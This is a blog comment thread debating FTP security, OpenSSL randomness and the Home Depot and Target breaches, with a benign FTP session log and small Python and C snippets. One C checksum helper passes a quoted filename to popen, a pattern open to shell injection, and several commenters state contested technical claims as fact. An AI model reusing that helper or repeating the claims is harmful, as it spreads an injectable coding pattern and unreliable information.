    In tests on tiny servers, FTP can sustain thousands of connections and max out bandwidth whereas Apache can only sustain a few hundred. FTP being simpler just uses fewer resources per connection. So, since servers cost money, you can get more throughput for the money with FTP.
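
    From the client side the two are interchangeable for a single fetch; here is a one-line sketch of each, using Python’s standard library (the mirror host and file are made-up examples):

        # Same client call, two very different protocols underneath.
        from urllib.request import urlretrieve

        urlretrieve("ftp://mirror.example.org/pub/big.iso", "big.iso")   # FTP
        urlretrieve("http://mirror.example.org/pub/big.iso", "big.iso")  # HTTP

    The difference shows up on the server, in how many such connections each daemon can sustain at once.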

  34. DrLoser says:

    But I don’t want to leave oiaohm behind in this. He might well have a propensity to “move the goalposts” — indeed, that’s all he ever does, beyond fantasising and getting things hopelessly and provably wrong — but he’s good for a joke now and again:

    This is why the Linux Foundation is starting an audit team now, so we have a group with enough respectable force to hopefully get project leads’ proper attention and, if that fails, the resources to advertise the issues.

    Interesting that a marketing organisation (the Linux Foundation) should somehow take charge of making OpenSSL … sort of … work. Any credentials?

    Never mind. Let’s just “advertise the issues.”

    SSL, multiple times.
    Heartbleed.
    ShellShock.

    Enough “issues” for you, oiaohm?

    What a shame that Valgrind let you down. If only it were compulsory, except not.

    And apparently (I didn’t check, but oiaohm did), there are still thousands of memory issues out there in OpenSSL!

    Given which … hey, there’s nothing wrong with FTP.

    At least FTP doesn’t claim any sort of security whatsoever.

  35. DrLoser says:

    Modifying it or using the server to penetrate to more sensitive data would be a bigger concern.

    Good, Robert, very good.

    “Using the server” is precisely my point about FTP, in re Target and Home Depot and others.

  36. DrLoser says:

    FLOSS by its nature has backup so any denial of service/deletion of files is not of huge economic consequence because the data can be found elsewhere.

    Customer: My credit card details were scraped off a Target/[insert here] POS! I’m being charged $1,000 for nothing!
    Wise Man: Did you experience “denial of service?”
    Customer: What’s one of those? I don’t think so. I’ve just got this $1,000 charge on my monthly bill.
    Wise Man: But did they delete your files?
    Customer: What? I don’t think so. Does it matter? Would that cost me money? I’m confused. Anyway, about this identity theft thing …
    Wise Man: Never fear, Young One. The data can be found elsewhere…

    As in, say, Trans-Dniestr. You haven’t tried that one for Linux web pages, have you, Robert? I would if I were you. Trifficly secure and all.

    Here’s a question for you.

    What on earth has this to do with the question of how Home Depot came to cough up the credit card details of a couple of hundred thousand customers?

    Or, indeed, to the purported universal and obviously totally secure value of FTP?

    It’s very possible that “FLOSS” has everything to do with all that.

    But I don’t imagine that you’d like to hear why.

  37. DrLoser says:

    Any small carps about all that, Robert?

    No?

    Oh, I forgot. Microsoft is Evil!

  38. DrLoser wrote, of the value of FLOSS, “Care to dig yourself any deeper holes”?

    Of course FLOSS has a lot of value, but when you are trying to “give it away”/share it, there’s no concern about anyone stealing the information from a server. Modifying it or using the server to penetrate to more sensitive data would be a bigger concern. FLOSS by its nature has backup so any denial of service/deletion of files is not of huge economic consequence because the data can be found elsewhere.

  39. DrLoser says:

    That could be important where the volume of data is very high or the value is very low, typical of many archives of FLOSS, for instance.

    I’d also take issue with your insistence that the value “of many archives of FLOSS” is “very low.”

    I’d prefer the term “negligible,” or possibly “worthless since the last LTS.”

    Care to dig yourself any deeper holes, Robert?

  40. DrLoser says:

    The binary for the ftp client on my system is only 20% of the size of the binary for wget, for instance.

    I’ve got to admit, Robert, that is a pretty compelling sales point.

  41. DrLoser says:

    Incidentally, it’s hilarious that you mentioned HTTP.

    You do know the default protocol for downloading a file through HTTP, don’t you, Robert?

    Clue: three letters, starting with an F and continuing on. The big difference here is that the TCP/IP port for FTP is not used for this purpose.

    There’s actually a transport mechanism called HTTP, which allows for logging, auditing, specific app controls, all sorts of things like that … even levels of security like SHTTP … but otherwise it behaves precisely the same as an FTP server.

    Minus the lunacy of leaving ports 20 and 21 open to the outside world, of course. And possibly at a cost of 20% bitty overhead.

  42. DrLoser says:

    You should be able to do more with less hardware/time/money with an FTP server rather than HTTP or SMB. That could be important where the volume of data is very high or the value is very low, typical of many archives of FLOSS, for instance.

    Well, security comes at a price, Robert. You don’t offer any figures, so let’s go with my home system here: runs at 2Gbits a second, I think. And let’s postulate that a secure system costs a hundred times more bits per second (it doesn’t).

    Here I am, sitting at home as a Head Honcho of my local Target store. I feel the desperate need to download a file at 20:00, outside work.

    Oh look, using proper secure methods I can actually download a 100 megabyte file in roughly … er … a minute.

    That’s a tough price to pay. Why, I might not even have the time to brew a cup of 50¢ coffee while I’m waiting.

  43. DrLoser says:

    You did not mention “outward-facing” or “to the web”, just “firewalls”.

    Nor did I mention the specific port involved, the details of whether to choose SFTP or FTPS or your favourite vsftpd, Robert.

    I have probably omitted a dozen or so other footnotes that might be deemed appropriate.

    I have to assume that any reader competent in IT, when they see a throw-away reference to FTP in regard to a massive security breach, will draw the conclusion that I am talking about outward facing FTP servers.

    I also have to assume that any reader on this site is competent in IT. It’s just a courtesy thing, I know, but I assume that everybody here is competent in IT.

    The simple term firewalls might just have given my meaning away, incidentally. Quick question: where is a firewall most useful?

    I’ve shown several corporate firewalls allowing FTP.

    Yes, Robert, you have. You have cited precisely two (Red Hat in 2001 and IBM in whenever) that allow FTP downloads of packaged software to an FTP client, which is fair enough.

    Do you know where those firewalls might be? They’re on the other side of the server charged with the FTP downloads. Between that server and the corporate network. Unless Red Hat, IBM, or both are certifiably insane. Which they are not.

    And now back to “moving the goal-posts.”

    Do you have a clear explanation of your reasoning to deny the obvious fact that any other poster, say, oiaohm, is “moving the goal-posts” by bringing in an extrinsic subject such as M$ Office?

    Presumably not. Well, then, how do you explain the fact that everything you have said so far about FTP is completely useless to a company like Target or Home Depot, when it comes to preventing the extraction of stashed security-relevant data from outside the corporate network?

    I mean, it’s not even as if you’re offering a Linux alternative.

    I can offer several, if you ask nicely.

  44. DrLoser says:

    I know of very few firewalls that allow SMB/CIFS through to the Internet so those FTP and e-mail options can be very useful.

    Also, insanely dangerous. Although it isn’t clear to me where e-mail comes into the equation. Moving the goal-posts again?

    Given your stated aversion to anything Microsoft, Robert, I would expect you to have come across precisely no firewalls that leave SMB/CIFS ports (139 and 445) open. But it worries me greatly that you know of “very few,” that is, more than a single one.

    Tell those idiots to stop doing it, right now.

    oiaohm asserts that there are certain “multi purpose printers” for which Microsoft requires access via FTP. My assertion is that, saving the odd piece of garbage that even an SME would turn their nose up at, there are none.

    And, pardon me, but the Xerox Phaser 6128 comes plentifully equipped with direct drivers for Windows 7, Windows Vista, Windows XP, and I haven’t looked but very probably Windows Server 200x.

    No FTP required. If some idiot wants to force FTP on the thing, it’s up to them.

    The question is not whether you can configure a “multi-purpose printer” to be used via FTP.

    The question is, why would you want to? And a secondary question: why would you want this ability from outside the Corporate domain?

  45. DrLoser, accusing me of moving goalposts, wrote, “It is blatantly unsuited to use as an outward-facing corporate file transfer system.”

    This was his original statement:
    Sane corporate firewalls bar FTP

    You did not mention “outward-facing” or “to the web”, just “firewalls”. I’ve shown several corporate firewalls allowing FTP. I’ve seen some firewalls that even block ftp clients from getting out to download stuff from the web, but there do exist a lot of sane folks who value FTP for what it is and use it wisely. They are not insane.

    There are a lot of very good reasons to use FTP in special cases where security is not paramount. You should be able to do more with less hardware/time/money with an FTP server rather than HTTP or SMB. That could be important where the volume of data is very high or the value is very low, typical of many archives of FLOSS, for instance. In my particular use of FTP, we have a service where any visitor to our home with iThingy, Android/Linux or even that other OS can share/examine our extensive file-collection. e.g. Christmas photos from when so-and-so was a baby, or this cute cartoon I found on the web, and photos from whatever smart thingy is on the LAN.
    Compare that to my first experience of “7” when all our networked printers that worked fine with SMB/CIFS from XP would not work with “7”. Forget scanning. PRINTING.

  46. DrLoser, becoming a real bore, wrote, “Again with this drivel about “multi function network printer/photocopiers.” I’ve never seen or heard of one that requires using FTP. Have you? Which model? ”

    I have one. Xerox MFP 6128.
    “Depending on the printer’s connection (USB or Ethernet), you can send scanned files directly from the printer’s control panel to a computer, an FTP server, or to email. You can also scan directly into an application from a computer.”

    I know of very few firewalls that allow SMB/CIFS through to the Internet so those FTP and e-mail options can be very useful. We use FTP because it works for every device here.

  47. DrLoser says:

    DrLoser, moving the goalposts, wrote, “Specifically, outward facing FTP.”

    You read that long piece by oiaohm, in which he moves the goalposts so far over the horizon that he brings M$ Office onto the playing field, and you accuse me of “moving the goalposts,” Robert?

    I admire your hyper-selective chutzpah.

    No, I’m not moving the goalposts. As you will recall, the FTP discussion started with my demolition of Dougie’s credit-card myth, in which I mentioned FTP only in passing.

    Since you chose to take up the subject (and since I made the comment clearly in reference to Black Hats retrieving stashed security-sensitive information from the outside), I believe the onus is on you to avoid “moving the goalposts.”

    Whether or not FTP is suitable to your strictly domestic needs … whether or not IBM or Red Hat choose to use it in a sandboxed way to download software packages …

    It is blatantly unsuited to use as an outward-facing corporate file transfer system.

    That was my point in the first place, and it remains my point now. My goalposts stand precisely where they stood at the beginning. Yours (and oiaohm’s) seem to shift with the sands.

  48. DrLoser, moving the goalposts, wrote, “Specifically, outward facing FTP.”

    Well, inward or outward, on LANs and the web, FTP is still very useful and widely used by sane people. It was never designed for security but for simplicity/speed/efficiency.

    The binary for the ftp client on my system is only 20% of the size of the binary for wget, for instance.

    Several very simple means of securing ftp servers exist, including read-only file-systems, chroots, virtual machines, transfers via SSH, and checksums and signatures. SFTP, which has been mentioned here, transfers files by SSH and shares little if any code/protocol with FTP, but it’s what I use when I want to transfer files securely, say to/from some personal account. FTP is what I use when I want to move a lot of stuff in a hurry and security is little/no consideration.
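
    For what it’s worth, a minimal sketch of that kind of SFTP transfer, assuming the third-party paramiko library (the host, user and file names are made-up examples):

        # SFTP: file transfer over SSH, sharing nothing with classic FTP.
        import paramiko

        client = paramiko.SSHClient()
        client.load_system_host_keys()  # trust hosts already in known_hosts
        client.connect("files.example.com", username="bob")  # key-based auth assumed

        sftp = client.open_sftp()
        sftp.put("photos.tar", "backups/photos.tar")  # upload over the SSH channel
        sftp.close()
        client.close()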

  49. DrLoser says:

    Once again, oiaohm (and Robert): that discussion was about FTP.

    It wasn’t about OpenSSL. In fact I used OpenSSL as a mitigation for the apparent number of CVEs linked to FTP.

    It wasn’t about Microsoft.

    It most certainly was not about some mythical horde of FTP-reliant multi purpose printers foisted by the Evil Ones on global corporations at large.

    It was about FTP. Specifically, outward facing FTP.

  50. DrLoser says:

    SSL/TLS standards put requirements on how your random generator should operate; this excludes using undefined-buffer methods, because you are meant to use a formally audited random number generator.

    Not as far as I am aware, they don’t. In fact, it’s hard to see how they could, short of having a Reference Suite.

    DrLoser, this is a problem when you start commenting on stuff you don’t understand.

    Obviously it is, oiaohm. May I gently suggest that you stop doing it?

    Due to Valgrind hitting their random number generator, the OpenSSL developers were closing all bugs submitted based on Valgrind testing, so thousands of detectable memory issues exist inside OpenSSL…

    Pure fantasy. Or do you invite the OpenSSL developers round to tea every Wednesday afternoon for a cozy little chat about progress?

    MS Office has also had an above-average CVE count; this is explained when you find out that the file format they were using was not documented.

    a) Not especially relevant to file transfer, is it?
    b) How would one go about calculating this “average”?

    The answer is every third party who looked at OpenSSL properly got ignored.

    Including Debian, Red Hat, Ubuntu … this is hardly a defence of GNU/Linux, is it?

    “Don’t worry about security, Ma’am … we’ve decided to ignore it. That’s the industry standard, y’see!”

    I have some big bad news for you. Windows uses third party FTP servers a lot in business.

    I have some “big bad news” for you. It doesn’t.

    Again with this drivel about “multi function network printer/photocopiers.” I’ve never seen or heard of one that requires using FTP. Have you? Which model? Where did you dumpster-dive it from?

  51. oiaohm says:

    DrLoser, even before the Debian SSL bug, the entropy of OpenSSL was broken, just not as badly.

    1) Why anybody would rewrite even a pathetic randomisation process, simply because Valgrind told them to do so, is beyond my comprehension.
    It’s not just a breach of Valgrind; what OpenSSL is doing is a breach of the SSL/TLS standards as well. SSL/TLS standards put requirements on how your random generator should operate; this excludes using undefined-buffer methods, because you are meant to use a formally audited random number generator. Using undefined buffers never passes formal auditing.

    DrLoser, this is a problem when you start commenting on stuff you don’t understand. Due to Valgrind hitting their random number generator, the OpenSSL developers were closing all bugs submitted based on Valgrind testing, so thousands of detectable memory issues exist inside OpenSSL; this is why there is now a huge cleanup, with new personnel employed by the Linux Foundation supervising. This means items like Heartbleed get to exist due to improper management of the project. Yes, improper auditing and bug processing in OpenSSL have resulted in it having many times the number of CVE issues it should have had. Above-average CVE numbers for an SSL implementation (you can replace this with any type of program) should raise major alarm bells. MS Office has also had an above-average CVE count; this is explained when you find out that the file format they were using was not documented. It’s very hard to audit anything when you don’t have documentation of how it should work.

    2) Why the developers of the relevant bit of SSL would conclude that their implementation had any sane amount of entropy is also beyond me.

    The answer is that every third party who looked at OpenSSL properly got ignored. This is why the Linux Foundation is starting an audit team now, so we have a group with enough respectable force to hopefully get project leads' proper attention and, if that fails, the resources to advertise the issues. GnuTLS has its issues, but it does in fact have a random number generator conforming to the SSL/TLS specifications, and GnuTLS does not use undefined buffers. If you wanted to pick the more conforming of OpenSSL and GnuTLS, you would be forced to choose GnuTLS. Yet, due to the LGPL licence on GnuTLS, a lot of closed-source developers were choosing OpenSSL. This is the problem: the OpenSSL taint is everywhere.

    In fact, GnuTLS and other SSL developers had questioned OpenSSL's entropy, and again got no media coverage or support to force the OpenSSL project lead to fix things. It seems we have to have an exploit before we will breathe down project leads' or companies' necks about security.

    DrLoser
    But not a single one of them, as far as I can see, mentions That Other OS.
    I have some big bad news for you. Windows uses third-party FTP servers a lot in business, some of it for really stupid reasons. For example, among multi-function network printer/photocopiers you can find some that will only scan to an FTP server dependably and in fact fail when sending to an SMB share. Guess what: Microsoft's FTP server is not installable on the desktop client, so the result is a huge stack of FTP versions at differing levels of insecurity on Windows. In reality I agree with olderman that FTP mostly should die: FTP, even SFTP, has no idea of multiple domains on a single IP address. But I also think an FTP server should be made part of the client OS, for hardware compatibility and to kill off the security-from-hell problem. Not only are these Windows client machines using insecure versions that use things like broken OpenSSL, they are also not being updated. The FTP mess is way worse on Windows than on Linux or OS X. OS X and Linux have upstream-provided FTP servers, so you don't have a third-party mess.

    DrLoser, CVE is kind of deceptive here: since a third party provides the FTP server on the Windows desktop OS, it's not branded as a Windows or Microsoft issue. Learn to read CVEs with a little more care. There are many things to stare at Microsoft over and say "fix".

  52. olderman says:

    “The second thing we did was to shut down all the FTP ports.”

    Oh, BTW, nice try, Robert Pogson. Reaching an anonymous FTP site hosted by an academic institution is nothing exciting; such sites have been around since the dawn of the Internet (SIMTEL20, anyone?).

    Any hosts with important information sit behind stateful firewalls, with tightly controlled inbound access for local objects and zero direct access from the Internet.

    And interestingly enough, while Mrpogson.com does indeed reject FTP requests, it does respond quite nicely to an SFTP open request. You may want to look at that.

  53. dougman says:

    I would not call this a failure, but it sure looks like M$ wants everyone to be able to use their SERVICES. I've been a Skype user since 2003, and of late have used Google Hangouts along with the WebRTC interface.

    “When Skype for Web does enable WebRTC, it should work just fine on Chromebooks as well.”

    http://www.pcworld.com/article/2847863/microsoft-announce-skype-for-web-beta-brings-voice-and-video-calls-to-your-browser.html

  54. DrLoser says:

    This isn’t even a discussion about M$, Robert. It’s a discussion about the merits of FTP in any of its forms.

    The one time I did a security audit, I was working for a telecoms company (supplying BT with most of their non-core DSLAM access) whose entire system was either Solaris (servers) or Linux (desktops).

    The first thing we did was to close off the FTP ports. Including SFTP, as it happens.

    No, wait a mo’, my memory is leading me astray. The first thing we did was to shut down all the RPC ports.

    The second thing we did was to shut down all the FTP ports.

  55. DrLoser says:

    I never claimed FTP was secure but that it was efficient.

    That isn’t what you claimed at all, Robert. Take that M$ claim, for example — nothing to do with “efficiency.” Also hopelessly wrong, in re FTP.

    When security doesn't matter:
    1) the data is of no value to spies, and
    2) the data has an independently confirmed signature/checksum

    And this would apply to Home Depot and to anybody else who has an unsecured FTP port that allows an outsider to browse around their file system and retrieve stashes of data, how?

    I hardly think that the presence, or absence, of a PGP signature is going to cause such people even a moment’s thought.

    But, to your claims:

    Many wrap it with SSH if they need greater security, but IBM and others are quite sane to use FTP.

    For proof, you link to an IBM site specifically designed for downloading via FTP. This hardly counts, as far as security goes, does it, Robert? There are going to be layers and layers of security beyond that point to stop an infiltrator getting to the corporate IBM network, which is what we are talking about here.

    FTP is very efficient for transferring large files like backups or image-files.

    Or, indeed, files containing hundreds of thousands of batched credit-card records.

    I believe that was rather the point here, Robert.

    Back in the day, RedHat boasted of the performance of their FTP servers…

    Back in 2001, yes. For downloading pre-packaged distros, yes (as per your IBM cite). For the purposes of a discussion about hacking into Home Depot, this is completely irrelevant.

    Where signing the files or sending checksums is sufficiently secure, FTP is hard to beat.

    Something of a circular argument, I feel. And it also leaves out the small but relevant fact that, if you have an insecure FTP server facing outwards from your corporate network, sending legitimate files to legitimate destinations should be the very least of your concerns.

    Many LANs allow FTP connections and they are sane.

    And precisely zero LANs offer access from the outside into a corporate network. Perhaps that is why they are called Local Area Networks.

    OTOH, I think many organizations are insane to use SMB/CIFS on their LANs.

    Fortunately “many organizations” have an approach to security that is not, like yours, buried in the Stone Age.

    M$’s protocols are just too bloated to be efficient or secure.

    I believe you are thinking of “OpenSSL” here. SMB/CIFS is quite lean in comparison. And it’s also in continuous development by security experts. Unlike OpenSSL.

    We use FTP on our LAN for commodity files like images from the smart thingies, cameras or scanner. It works like a charm.

    For that purpose, yes.

    For any purpose that involves security, no it does not.

  56. olderman wrote, “Many companies use FTP out of ignorance or issues supporting SFTP.”

    Like this?
    ftp> open ftp.cs.nyu.edu
    Connected to cs.nyu.edu.
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-Local time is now 07:39. Server port: 21.
    220-Only anonymous FTP is allowed here
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
    Name (ftp.cs.nyu.edu:pogson): anonymous
    230-Your bandwidth usage is restricted
    230 Anonymous user logged in
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> passive
    Passive mode on.
    ftp> cd /pub/courses/unixtools
    250 OK. Current directory is /pub/courses/unixtools
    ftp> get README
    local: README remote: README
    227 Entering Passive Mode (128,122,49,30,185,21)
    150 Accepted data connection
    226-File successfully transferred
    226 0.005 seconds (measured here), 133.52 Kbytes per second
    729 bytes received in 0.00 secs (11.3972 MB/s)
    ftp> bye
    221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
    221 Logout.

  57. olderman says:

    “FTP is great and corporations large and small use it. ”

    Many companies use FTP out of ignorance or issues supporting SFTP. SFTP is the secure file-transfer protocol that is standard on ALL Linux systems (it's part of the SSH suite, along with SCP, the secure form of RCP).

  58. DrLoser wrote, “Here, Robert. I’ve taken the liberty of asking Mitre for the last three years of CVEs with “FTP” as a keyword.”

    If you change that to a specific product, like vsftp, you get two hits: one for a Linux kernel bug and another for a libc problem, not FTP. If you search for netkit-ftp or netkit, you find nothing. Those provide the ftp client on Debian Jessie.

    Again, corporations and others use FTP for efficiency not security.

  59. DrLoser wrote, “Here, Robert. I’ve taken the liberty of asking Mitre for the last three years of CVEs with “FTP” as a keyword.”

    Many of those have to do with OpenSSL, nothing to do with FTP per se. One can do FTP over SSH of course.

  60. DrLoser wrote, “But not a single one of them, as far as I can see, mentions That Other OS.
    I submit that this is a fatal flaw in your premise.”

    I never claimed FTP was secure but that it was efficient. When security doesn't matter:
    1) the data is of no value to spies, and
    2) the data has an independently confirmed signature/checksum
    FTP is great and corporations large and small use it. You are the one who claimed they don't.
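
    For illustration only (a sketch of mine, not anyone's production process), the checksum step could look like this on a Unix box with sha256sum on the PATH and the digest published over some trusted channel:

    #include <stdio.h>
    #include <string.h>

    /* Compare a downloaded file's SHA-256 with an independently published
     * digest. Illustration only: don't pass untrusted filenames to a shell. */
    int main(int argc, char **argv) {
        char cmd[512], line[512];
        FILE *p;

        if (argc != 3) {
            fprintf(stderr, "usage: %s <file> <expected-sha256-hex>\n", argv[0]);
            return 2;
        }
        snprintf(cmd, sizeof cmd, "sha256sum '%s'", argv[1]);
        p = popen(cmd, "r");
        if (!p || !fgets(line, sizeof line, p)) {
            perror("sha256sum");
            return 2;
        }
        pclose(p);
        line[64] = '\0'; /* the first 64 hex characters are the digest */
        if (strcmp(line, argv[2]) == 0) {
            puts("checksum OK");
            return 0;
        }
        puts("checksum MISMATCH; discard the download");
        return 1;
    }

    If the published digest comes over a channel the attacker can't also tamper with, plain FTP for the bulk bytes costs nothing in integrity.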

  61. DrLoser says:

    Folks who don’t use M$’s OS have no problem with FTP as a protocol.

    Folks who don’t use M$’s OS must have a hopelessly serene attitude to having their system thoroughly compromised, then.

    Here, Robert. I’ve taken the liberty of asking Mitre for the last three years of CVEs with “FTP” as a keyword.

    Right at the top, from the end of October, you will notice CVE-2014-4877, which prominently features the word GNU and has a severity rating of 9.3/10.

    Now, this is pretty much a brute force lookup, and the word “OPENSSL” occurs with depressing regularity, so not all the hundreds of CVEs (in only the last three years, note) can be said to be FTP flaws.

    But not a single one of them, as far as I can see, mentions That Other OS.

    I submit that this is a fatal flaw in your premise.

  62. That Exploit Guy says:

    Folks who don’t use M$’s OS have no problem with FTP as a protocol.

    I have no problem with protocols that provide rudimentary ways to distribute files.

    I also have no problem with big box outlets that demand rudimentary ways to distribute files. After all, we all have files that require rudimentary ways to distribute, right?

    I only have problems with big box outlets that neglect to diversify, and FTP is simply not a good way to diversify.

    Instead, they should use BitTorrent. Encrypt the shared files for greater security, if they must.

    The last thing anyone needs is a centralised, brand-dependent protocol like FTP.

  63. That Exploit Guy says:

    I can’t argue with the negligence of those big box outlets but it surely didn’t help them to rely on M$ for IT.

    I am pretty sure everyone has his or her own morning rituals, you know, brushing one’s teeth with a particular brand of toothbrush, eating a particular brand of cereal, boiling water with a particular brand of kettle, and driving to work in a particular brand of vehicle.

    Sure enough, this reliance on particular brands is a bad idea, or dare I say, “negligence”?

    This is why we need to diversify. In other words, we need to brush each tooth with a different brand of toothbrush, make sure each bowl of cereal we eat consists of various brands and types, boil each drop of our favourite beverages in a different brand of kettle and seat each of our bum cheeks in a different brand of vehicle.

    Only then, we may call ourselves “diligent” and “attentive”.

  64. DrLoser wrote, ” Sane corporate firewalls bar FTP.”

    I can't argue with the negligence of those big box outlets but it surely didn't help them to rely on M$ for IT. Folks who don't use M$'s OS have no problem with FTP as a protocol. Many wrap it with SSH if they need greater security, but IBM and others are quite sane to use FTP. FTP is very efficient for transferring large files like backups or image-files. Back in the day, RedHat boasted of the performance of their FTP servers.

    Where signing the files or sending checksums is sufficiently secure, FTP is hard to beat. Many LANs allow FTP connections and they are sane. OTOH, I think many organizations are insane to use SMB/CIFS on their LANs. M$’s protocols are just too bloated to be efficient or secure. We use FTP on our LAN for commodity files like images from the smart thingies, cameras or scanner. It works like a charm.

  65. DrLoser says:

    DrLoser, think about this: if in 2003 the memory errors had been forced to be fixed up, the hartbleed bug would not have been in existence by the time it was exploited. Yes, the 2003 Valgrind logs in the OpenSSL bug list include the hartbleed bug location. Hartbleed is a direct result of neglect and of a project lead being an idiot and believing a myth.

    I’ve taken the appropriate time to think about it, oiaohm… Done.

    The memory “errors” are twofold.

    1) Why anybody would rewrite even a pathetic randomisation process, simply because Valgrind told them to do so, is beyond my comprehension.
    2) Why the developers of the relevant bit of SSL would conclude that their implementation had any sane amount of entropy is also beyond me.

    Oh, and how you, oiaohm, have managed to conflate the original Debian SSL exploit with what you call “hartbleed,” but which is more typically referred to as Heartbleed, is also beyond me.

    The original Debian SSL bug was to do with entropy.

    Heartbleed simply involved the ability to harvest OOB memory, which might or might not include PK encryption information.

    Do try to keep up, oiaohm.

  66. DrLoser says:

    Robert Pogson, exactly. Undefined buffers: their contents are annoyingly defined.

    That’s the thing about “undefined buffers,” oiaohm. They are annoyingly defined.

    Or … well, y’know … whatever.

  67. DrLoser says:

    Oh, wait, for a moment there I thought that “xrdp” was something exciting and useful.

    Not that I wish to deprecate terminal servers. I cut my teeth on multiplexing the things. A little, shall we say, 1980s or so?

  68. DrLoser says:

    Just noticed this, Robert.

    I’m sure there’s an equivalent functionality for that other OS, say Cygwin/X or xrdp (deleted from Wikipedia, eh?), homepage here.

    Well, you know what Wikipedia is like when it comes to shameless self-promotion without any factual backing, Robert.

    Here’s your chance to get one over on the buggers!

    What is “xrdp,” anyway?

    And how, in even the vaguest terms, might it compete with an enterprise-ready “mail and calendaring” system?

    I mean, kolab is obviously a lost cause. But this xrdp thing might be a runner …

    … Shout it out for us!

  69. DrLoser says:

    DrLoser, something to be aware of is that some of the random number generators in Microsoft applications use the undefined-buffer method.

    Really, oiaohm?

    Do tell. Also, cite a link.

  70. DrLoser says:

    Why is that last but one comment “awaiting moderation,” Robert?

    Not a single swear word. Not even an ad hominem.

    If you really wish to impose a ban-hammer, then impose a ban-hammer. This Mary Poppins stuff does not become you.

  71. DrLoser says:

    Incidentally, devotees of the “Closing Every Window” philosophy will be delighted to hear of the up-to-the-moment Security Conscious decision made by Home Depot to avoid any future issues:

    They bought all their executives Macs.

    Or, to quote:

    [They replaced] their dated company Windows computers and old smartphones with Apple, Inc. (AAPL) Macs and iPhones, which IT staff claims are more secure.

    Wot no GNU?

    The executive staff calls their new Apple phones “Bat Phones.”

    How very sweet.

    And how utterly unrelated to the original issue.

    Still, executives will be children, I suppose.

  72. DrLoser says:

    However, since you brought up credit cards, oh what was the major flaw that Home Depot just suffered? They blamed M$ Windows and reliance on Win-Dohs is going to cost them hundreds of millions.

    Interesting you should bring that up, Dougie, since I have six years’ insider knowledge from Visa. (As compared to your, I believe, big fat zero.)

    1) At the time of purchase, XPe was technically about as good as it got on embedded POS systems. OS/2 was getting creaky. Embedded Linux was still in its “start-up” phase. If you wanted your POS terminal to work in 2003, you probably wanted to buy Microsoft.
    2) As of 2013, these systems were ten years old. And people had been begging Home Depot to upgrade to something with proper memory protection like embedded Windows 7 for quite some time.
    3) Giant retail operations like Home Depot or Target are seemingly more interested in paying off a CEO for IT negligence to the tune of $28 million, rather than spending this money on IT security.

    That, unfortunately, is the way it is. None of these companies is truly capable of running a secure IT system. It doesn’t really matter which OS they choose.

    To the technical details:
    1) I’m sure I don’t have to explain to you, Dougie, what “RAM scraping” is. Well, perhaps I do. But I’m not going to.
    2) In order to “RAM scrape” credit card details, etc, from an embedded device of whatever OS, you need to cross the security boundary from the outside world to the POS.
    3) You can’t do this by waving a magic wand, or carefully crafting a bogus credit card.
    4) You can only do this by subverting the server that updates the firmware.
    5) In the good old days (1994-2000, when I worked at VISA), this server belonged to the Clearing System — e.g. Visa or MasterCard. We (VISA) ran it on a whopping great AIX box that, in its spare time, hosted Deep Blue, the chess wizard.
    6) Apparently this is no longer so.
    7) Evidently the same idiots who cannot be bothered to update their POS systems (Home Depot, Target, etc) are in charge of the servers that do the firmware updates.
    8) These servers are the parts of the system that are the gateway to being compromised.
    9) The way this works is that the compromised server stashes credit card information for later retrieval.
    10) This later retrieval — Robert will be pleased to hear — is apparently often done via FTP. Sane corporate firewalls bar FTP. Home Depot and Target … who knows?

    And you may be wondering how the servers were compromised in the first place? Well, nobody has satisfactorily answered that question. But here’s one reasonable supposition:

    Hackers commonly use SQL injection, packet sniffing, or spear phishing to steal the login credentials of the targeted retailer or an affiliate (as in the Target hack) with high-level access.

    Hard to blame M$ for any of that, isn’t it?

    As always, it boils down to cheapskate corporate stupidity.

    Not to the supplier of the Operating System. But, back to the sadly misinformed Dougie:

    At least M$ can not be sued or held responsible, as Home Depot did agree to the EULA when they used M$ software. Fair wouldn’t you say?

    I wouldn’t know: I’ve never read the Windows XPe EULA. Nor, for example, have I read the equivalent OS/2 EULA. Nor the EULA for Oracle POS machines, which I understand use Linux.

    Naturally, you, Dougie, have read and fully digested the implications of all three. May I request a brief summary of the relevant details?

  73. oiaohm says:

    Robert Pogson, exactly. Undefined buffers: their contents are annoyingly defined. If you are lucky, you will have an undefined buffer pointing to somewhere containing random data. The majority of the time it will be pointing to somewhere constant, or somewhere that a minor coding change will turn constant.

    The majority of computer RAM, from a program's point of view on Linux, is filled with constant values.

    Further, in a snapshot of RAM there’s no guarantee the sample won’t be a large patch of constants and text in some software using a tiny portion of the bandwidth of a good random-number generator.

    There is a further point: there is no guarantee that the sample will not just be a full block of the same constants every time the program runs. Due to the way compilers and linkers optimize binaries, an undefined buffer's sample will come from the exact same area all the time. That point can be calculated by attackers; the fact that these alignments are constant is how some exploits work. For someone claiming to be a master of exploits not to know this suggests he needs to find himself a new, better name.

    DrLoser, something to be aware of is that some of the random number generators in Microsoft applications use the undefined-buffer method. Lots of computer-science courses teach the buffer-makes-random method but fail to tell students what they should fill the buffer with, so naive students do exactly what Exploit Guy did and, when they see the numbers changing, think everything is fine when it's not. 1) The buffer must be filled with unique values. 2) You want to use sources like sound-card noise, network transfer lags, the CPU's random generator… stuff that can truly generate a few random bits, mixed with each other. 3) It should be small enough not to be able to include every value, or too large a percentage of them. The result is increasing entropy. There are quite a few good books and standards on how to make decent random number generators with decent entropy; not one of them recommends the undefined-buffer method.

    Use the buffer-to-random method correctly and you get good results. Do what Exploit Guy did and you get something that can break easily and, worst of all, is not generating the randomness you would be expecting.
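
    For contrast, a minimal sketch (assuming Linux with /dev/urandom; not OpenSSL's code) of filling the same sort of buffer explicitly from the OS pool, which already mixes sources like those above:

    #include <stdio.h>

    int main(void) {
        unsigned int buf[100], result = 0;
        int i;
        /* Fill the buffer explicitly from the kernel's entropy pool
         * instead of trusting whatever start-up code left on the stack. */
        FILE *f = fopen("/dev/urandom", "rb");
        if (!f || fread(buf, sizeof buf[0], 100, f) != 100) {
            perror("/dev/urandom");
            return 1;
        }
        fclose(f);
        for (i = 0; i < 100; i++)
            result ^= buf[i];
        printf("test %x\n", result);
        return 0;
    }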

    The Debian SSL issue failed to raise the alarm bells it should have. There are a lot of improperly trained programmers out there using undefined buffers as random sources. The first case of alarm bells being raised over OpenSSL's use of undefined buffers was in 2003. People are very good at sticking their heads in the sand over these kinds of problems.

